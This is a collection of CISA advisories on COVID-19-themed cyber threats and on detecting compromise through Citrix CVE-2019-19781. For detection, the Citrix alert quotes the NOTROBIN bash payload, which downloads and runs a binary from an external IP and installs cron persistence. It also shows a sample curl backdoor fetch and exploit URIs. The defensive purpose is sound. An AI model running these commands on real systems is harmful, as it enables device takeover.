Threats_](<https://www.domaintools.com/resources/blog/free-covid-19-threat-list-domain-risk-assessments-for-coronavirus-threats>)\n * GitHub list of [IOCs used in COVID-19-related cyberattack campaigns](<https://github.com/parthdmaniar/coronavirus-covid-19-SARS-CoV-2-IoCs>) gathered by GitHub user Parth D. 
Maniar\n * GitHub list of [Malware, spam, and phishing IOCs that involve the use of COVID-19 or coronavirus](<https://github.com/sophoslabs/covid-iocs>) gathered by SophosLabs\n * Reddit master thread to collect [intelligence relevant to COVID-19 malicious cyber threat actor campaigns](<https://www.reddit.com/r/blueteamsec/comments/fiy0i8/master_thread_covid19corona_threat_actor_campaigns/>)\n * Tweet regarding the MISP project\u2019s dedicated [#COVID2019 MISP instance](<https://twitter.com/MISPProject/status/1239864641993551873>) to share COVID-related cyber threat information\n\n### Mitigations\n\nMalicious cyber actors are continually adjusting their tactics to take advantage of new situations, and the COVID-19 pandemic is no exception. Malicious cyber actors are using the high appetite for COVID-19-related information as an opportunity to deliver malware and ransomware, and to steal user credentials. Individuals and organizations should remain vigilant. For information regarding the COVID-19 pandemic, use trusted resources, such as the Centers for Disease Control and Prevention (CDC)\u2019s [COVID-19 Situation Summary](<https://www.cdc.gov/coronavirus/2019-ncov/cases-updates/summary.html?CDC_AA_refVal=https%3A%2F%2Fwww.cdc.gov%2Fcoronavirus%2F2019-ncov%2Fsummary.html>).\n\nFollowing the CISA and NCSC advice set out below will help mitigate the risk to individuals and organizations from malicious cyber activity related to both COVID-19 and other themes:\n\n * [CISA guidance for defending against COVID-19 cyber scams](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams>)\n * [CISA Insights: Risk Management for Novel Coronavirus (COVID-19)](<https://www.cisa.gov/sites/default/files/publications/20_0318_cisa_insights_coronavirus.pdf>), which provides guidance for executives regarding physical, supply chain, and cybersecurity issues related to COVID-19\n * [CISA Alert: Enterprise VPN 
Security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>)\n * [CISA webpage providing a repository of the agency\u2019s COVID-19 guidance](<https://www.cisa.gov/coronavirus>)\n * [NCSC guidance to help spot, understand, and deal with suspicious messages and emails](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>)\n * [NCSC phishing guidance for organizations and cyber security professionals](<https://www.ncsc.gov.uk/guidance/phishing>)\n * [NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n * [NCSC guidance on home working](<https://www.ncsc.gov.uk/guidance/home-working>)\n * [NCSC guidance on end user device security](<https://www.ncsc.gov.uk/collection/end-user-device-security/eud-overview/vpns>)\n\n## Phishing guidance for individuals\n\nThe NCSC\u2019s [suspicious email guidance](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>) explains what to do if you've already clicked on a potentially malicious email, attachment, or link. It provides advice on who to contact if your account or device has been compromised and some of the mitigation steps you can take, such as changing your passwords. It also offers NCSC's top tips for spotting a phishing email:\n\n * **Authority **\u2013 Is the sender claiming to be from someone official (e.g., your bank or doctor, a lawyer, a government agency)? Criminals often pretend to be important people or organizations to trick you into doing what they want.\n * **Urgency **\u2013 Are you told you have a limited time to respond (e.g., in 24 hours or immediately)? Criminals often threaten you with fines or other negative consequences.\n * **Emotion **\u2013 Does the message make you panic, fearful, hopeful, or curious? 
Criminals often use threatening language, make false claims of support, or attempt to tease you into wanting to find out more.\n * **Scarcity **\u2013 Is the message offering something in short supply (e.g., concert tickets, money, or a cure for medical conditions)? Fear of missing out on a good deal or opportunity can make you respond quickly.\n\n## Phishing guidance for organizations and cybersecurity professionals\n\nOrganizational defenses against phishing often rely exclusively on users being able to spot phishing emails. However, organizations that widen their defenses to include more technical measures can improve resilience against phishing attacks.\n\nIn addition to educating users on defending against these attacks, organizations should consider NCSC\u2019s guidance that splits mitigations into four layers, on which to build defenses:\n\n 1. Make it difficult for attackers to reach your users.\n 2. Help users identify and report suspected phishing emails (see CISA Tips, [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>) and [Avoiding Social Engineering and Phishing Scams](<https://www.us-cert.gov/ncas/tips/ST04-014>)).\n 3. Protect your organization from the effects of undetected phishing emails.\n 4. Respond quickly to incidents.\n\nCISA and NCSC also recommend organizations plan for a percentage of phishing attacks to be successful. Planning for these incidents will help minimize the damage caused.\n\n## Communications platforms guidance for individuals and organizations\n\nDue to COVID-19, an increasing number of individuals and organizations are turning to communications platforms\u2014such as Zoom and Microsoft Teams\u2014 for online meetings. 
In turn, malicious cyber actors are hijacking online meetings that are not secured with passwords or that use unpatched software.\n\n**Tips for defending against online meeting hijacking** (Source: [FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>), FBI press release, March 30, 2020):\n\n * Do not make meetings public. Instead, require a meeting password or use the waiting room feature and control the admittance of guests.\n * Do not share a link to a meeting on an unrestricted publicly available social media post. Provide the link directly to specific people.\n * Manage screensharing options. Change screensharing to \u201cHost Only.\u201d\n * Ensure users are using the updated version of remote access/meeting applications.\n * Ensure telework policies address requirements for physical and information security.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CovidLock ransomware exploits coronavirus with malicious Android app. TechRepublic.com. March 17, 2020.](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n\n[[2] TrickBot Malware Targets Italy in Fake WHO Coronavirus Emails. 
Bleeping Computer. March 6, 2020.](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\n[[3] Maze Ransomware Continues to Hit Healthcare Units amid Coronavirus (COVID-19) Outbreak. Security Boulevard. March 19, 2020.](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>)\n\n[[4] Spanish hospitals targeted with coronavirus-themed phishing lures in Netwalker ransomware attacks. Computing.co.uk. March 24, 2020.](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>)\n\n[[5] COVID-19 Testing Center Hit By Cyberattack. Bleeping Computer. March 14, 2020.](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>)\n\n[[6] CISA Tip: Protecting Against Malicious Code](<https://www.us-cert.gov/ncas/tips/ST18-271>)\n\n[[7] CISA Ransomware webpage](<https://www.us-cert.gov/Ransomware>)\n\n[[8] NCSC Guidance: Mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n\n[[9] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[10] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[11] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[12] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n[[13] COVID-19 Impact: Cyber Criminals Target Zoom Domains. Check Point blog. 
March 30, 2020.](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>)\n\n[[14] FBI Press Release: FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\n[[15] Microsoft Security blog: Human-operated ransomware attacks: A preventable disaster. March 5, 2020.](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>)\n\n[[16] Reposify blog: 127% increase in exposed RDPs due to surge in remote work. March 30, 2020.](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>)\n\n[[17] CISA Tip: Securing Network Infrastructure Devices](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nApril 8, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-08T12:00:00", "type": "ics", "title": "COVID-19 Exploited by Malicious Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-04-08T12:00:00", "id": "AA20-099A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-099a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:37:03", "description": "### Summary\n\nUnknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nThough mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later.\n\nCompromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.\n\nContact [CISA](<https://www.us-cert.gov/report>), or the [FBI](<https://www.fbi.gov/contact-us/field-offices/field-offices>) to report an intrusion or to request assistance.\n\n### Technical Details\n\n## Detection\n\nCISA has developed the following procedures for detecting a CVE-2019-19781 compromise. \n\n#### HTTP Access and Error Log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nThe impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in `/var/log`. 
Log files `httpaccess.log` and `httperror.log` should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.\n\n * `'*/../vpns/*'`\n * `'*/vpns/cfg/smb.conf'`\n * `'*/vpns/portal/scripts/newbm.pl*'`\n * `'*/vpns/portal/scripts/rmbm.pl*'`\n * `'*/vpns/portal/scripts/picktheme.pl*'`\n\nNote: These URIs were observed in Security Information and Event Management detection content provided by <https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>.[[2]](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\nPer TrustedSec, a sign of successful exploitation would be a `POST` request to a URI containing `/../` or `/vpn`, followed by a GET request to an XML file. If any exploitation activity exists\u2014attempted or successful\u2014analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak\u2019s blog provided sample logs indicating what a successful attack would look like.[[3]](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n`10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] \"POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\" 200 143 \"https://10.1.1.2/\" \"USERAGENT \"`\n\n`10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] \"GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1\" 200 941 \"-\" \"USERAGENT\"`\n\nAdditionally, FireEye provided the following `grep` commands to assist with log review and help to identify suspicious activity.[[4]](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n`grep -iE 'POST.*\\.pl HTTP/1\\.1\\\" 200 ' /var/log/httpaccess.log -A 1`\n\n`grep -iE 'GET.*\\.xml HTTP/1\\.1\\\" 200' /var/log/httpaccess.log -B 1`\n\n#### Running Processes Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nReviewing the running processes on a system suspected of compromise for processes running 
under the `nobody` user can identify potential backdoors.\n\n`ps auxd | grep nobody`\n\nAnalysts should review the `ps` output for suspicious entries such as this:\n\n`nobody 63390 0.0 0.0 8320 16 ?? I 1:35PM 0:00.00 | | `\u2013 sh -c uname & curl -o \u2013 http://10.1.1.2/backdoor`\n\nFurther pivoting can be completed using the process ID from the `ps` output:\n\n`lsof -p <pid>`\n\nDue to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the `httpd` process.\n\n### Checking for NOTROBIN Presence\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\n`pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k`\n\n`hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o`\n\n`/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo \"* * * * *`\n\n`/var/nstmp/.nscache/httpd\" | crontab -; /tmp/.init/httpd &\"`\n\nThe above is the NOTROBIN Bash exploit code. To check for NOTROBIN presence, analysts should look for the staging directory at `/tmp/.init` as well as `httpd` processes running as a cron job.\n\nRunning the command `find / -name \".init\" 2> /tmp/error.log` should return the path to the created staging directory while taking all of the errors and creating a file located at `/tmp/error.log`.\n\n### Additional /var/log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nAnalysts should focus on reviewing the following logs in `/var/log` on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the `nobody` user or `(null) on` and should try to identify any suspicious commands that may have been run, such as `whoami` or `curl`. 
Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.\n\n**bash.log**\n\nSample Log Entry:\n\n`Jan 10 13:35:47`\n\n`<local7.notice> ns bash[63394]: nobody on /dev/pts/3`\n\n`shell_command=\"hostname\"`\n\nNote: The bash log can provide the user (`nobody`), command (`hostname`), and process id (`63394`) related to the nefarious activity.\n\n**sh.log**\n\n**notice.log**\n\n### Check Crontab for Persistence\n\n**Context:** Host Hunt\n\n**Type: **Methodology\n\nAs with running processes and log entries, any cron jobs created by the user `nobody` are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for a `httpd` process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command:\n\n`crontab -l -u nobody`\n\n### Existence of Unusual Files\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nOpen-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.\n\n * `/netscaler/portal/templates`\n * `/var/tmp/netscaler/portal/templates`\n\n### Snort Alerts\n\n**Context: **Network Alert\n\n**Type: **Signatures\n\nAlthough most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. 
The following Snort rules were provided in FireEye\u2019s blog post and would likely indicate a vulnerable Citrix server.[5] These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .CONF response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7; content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; content:\"al]|0d0a|\"; distance:0; content:\"encrypt passwords\"; distance:0; content:\"name resolve order\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .PL response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7;`\n\n`content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; `\n\n`content:\"|0d0a|Connection: Keep-Alive\"; `\n\n`content:\"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6`\n\n`a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e74`\n\n`2e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f534`\n\n`3524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n### Suspicious Network Traffic\n\n**Context:** Network Hunt\n\n**Type: **Methodology\n\nFrom a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). 
Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing `/../` or `/vpns/` to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful `POST` request followed by a successful `GET` request with the aforementioned characteristics.\n\nGiven that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. 
As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).\n\n**Inbound Exploitation Activity (Suspicious URIs)**\n\n`index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml`\n\n**Outbound Traffic Search (Backdoor C2)**\n\n`index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET>`\n\n`| stats count by src dest dest_port`\n\n`| sort -count`\n\nThe following resources provide additional detection measures.\n\n * Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781.[[6]](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) The tool aids customers with detecting potential IOCs based on known attacks and exploits.\n * The National Security Agency released a Cybersecurity Advisory on CVE-2019-19781 with additional detection measures.[[7]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[8]](<https://github.com/cisagov/check-cve-2019-19781>)\n\n## Impact\n\nCVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. 
An attacker can exploit this vulnerability to take control of an affected system.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n### Mitigations\n\nThe resources provided include steps for standalone, HA pairs, and clustered Citrix instances.\n\n * Use Citrix's tool to check for the vulnerability. \n * <https://support.citrix.com/article/CTX269180>\n * Use an open-source utility to check for the vulnerability or previous device compromise. \n * <https://github.com/cisagov/check-cve-2019-19781>\n * <https://github.com/x1sec/citrixmash_scanner>\n * <https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.2>\n * Follow instructions from Citrix to mitigate the vulnerability. \n * <https://support.citrix.com/article/CTX267679>\n * <https://support.citrix.com/article/CTX267027>\n * Upgrade firmware to a patched version. \n * Subscribe to Citrix Alerts for firmware updates. \n * <https://support.citrix.com/user/alerts>\n * Patch devices to the most current version. 
\n * <https://www.citrix.com/downloads/citrix-gateway/>\n * <https://www.citrix.com/downloads/citrix-adc/>\n * <https://www.citrix.com/downloads/citrix-sd-wan/>\n\nConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.\n\nCISA's Tip [Handling Destructive Malware](<https://www.us-cert.gov/ncas/tips/ST13-003>) provides additional information, including best practices and incident response strategies.\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] GitHub web_citrix_cve_2019_19781_exploit.yml ](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\n[[3] TrustedSec blog: NetScaler Remote Code Execution Forensics](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n[[4] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[5] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[6] IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>)\n\n[[7] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[8] CISA Vulnerability Test Tool](<https://github.com/cisagov/check-cve-2019-19781>)\n\n### Revisions\n\nJanuary 31, 2020: Initial Version|February 7, 2020: Added link 
to the Australian Cyber Security Centre script\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Detecting Citrix CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-05-21T12:00:00", "id": "AA20-031A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-031a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:37:07", "description": "### Summary\n\n_Note: As of January 24, 2020, Citrix has released all expected updates in response to CVE-2019-19781._[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nOn January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0. \nOn January 22, 2020, Citrix released security updates for vulnerable SD-WAN WANOP appliances. \nOn January 23, 2020, Citrix released firmware updates for Citrix ADC and Gateway versions 12.1 and 13.0. 
\nOn January 24, 2020, Citrix released firmware updates for Citrix ADC and Gateway version 10.5.\n\nA remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution.[[2]](<https://support.citrix.com/article/CTX267027>) This vulnerability has been detected in exploits in the wild.[[3]](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\nThe Cybersecurity and Infrastructure Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible.\n\n#### Timeline of Specific Events\n\n * December 17, 2019 \u2013 Citrix released Security Bulletin CTX267027 with mitigation steps.\n * January 8, 2020 \u2013 The CERT Coordination Center (CERT/CC) released Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability,[[4]](<https://www.kb.cert.org/vuls/id/619785/>) and CISA released a Current Activity entry.[[5]](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n * January 10, 2020 \u2013 The National Security Agency (NSA) released a Cybersecurity Advisory on CVE-2019-19781.[[6]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * January 11, 2020 \u2013 Citrix released a blog post on CVE-2019-19781 with a timeline for fixes.[[7]](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n * January 13, 2020 \u2013 CISA released a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.[[8]](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n * January 16, 2020 \u2013 Citrix announced that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.\n * 
January 19, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes.[[9]](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * January 22, 2020 \u2013 Citrix released security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3.[[10]](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * January 22, 2020 \u2013 Citrix and FireEye Mandiant released an indicator of compromise (IOC) scanning tool for CVE-2019-19781.[[11]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n * January 23, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0.[[12]](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * January 24, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway version 10.5.\n\n### Technical Details\n\n#### Impact\n\nOn December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. 
This vulnerability has been detected in exploits in the wild.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n#### Detection Measures\n\nCitrix and FireEye Mandiant released an [IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) on January 22, 2020. 
